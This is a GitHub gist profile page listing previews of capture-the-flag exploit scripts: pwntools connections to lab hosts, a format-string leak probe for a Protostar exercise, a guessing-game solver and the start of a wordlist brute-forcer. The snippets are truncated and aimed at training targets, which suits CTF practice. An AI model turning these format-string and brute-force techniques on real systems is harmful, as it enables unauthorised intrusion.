Skip to content

Instantly share code, notes, and snippets.

View 0xPwny's full-sized avatar

AJ N 0xPwny

  • Segfault the world
  • Morocco
View GitHub Profile
@0xPwny
0xPwny / 4PPSTR-exploit.py
Last active August 1, 2025 09:37
MCSC16 CTF - 4PPSTR Pwnable Exploit / Abdeljalil Nouiri
#!/usr/bin/python
from pwn import *
con = remote("172.16.20.133",2020)
@0xPwny
0xPwny / format2.py
Created December 8, 2016 00:21
Format string 2 - protostar
#!/usr/bin/python
from pwn import *
########STAGE1 GET OFFSET
"""
cnx = remote("172.16.20.132",2020)
trash = "AAAA"+"-%x"*200
cnx.send(trash+"\n")
#!/usr/bin/python
#Guess | format string | leaking
#PicoCTF GUESS
from pwn import *
import time
import re
@0xPwny
0xPwny / guessingame.py
Created April 18, 2016 15:55
PACTF2016 - Guessing GAME
#!/usr/bin/python
from pwn import *
import random
while True:
co = remote('104.236.216.251',64753)
print co.recv()
co.send('abdel\n')
@0xPwny
0xPwny / FDbruter.py
Last active February 16, 2016 12:51
#!/usr/bin/python
import requests
import re
wordlist = open("/home/crypthon/Downloads/list.txt","rb").readlines() #http://pastebin.com/SjjiH2ua
for x in wordlist:
p = x.replace('\n','')
m = p.replace("\r","")
@0xPwny
0xPwny / test.py
Created February 7, 2016 09:29
test
#!/usr/bin/python
print "hello Madafuckerz"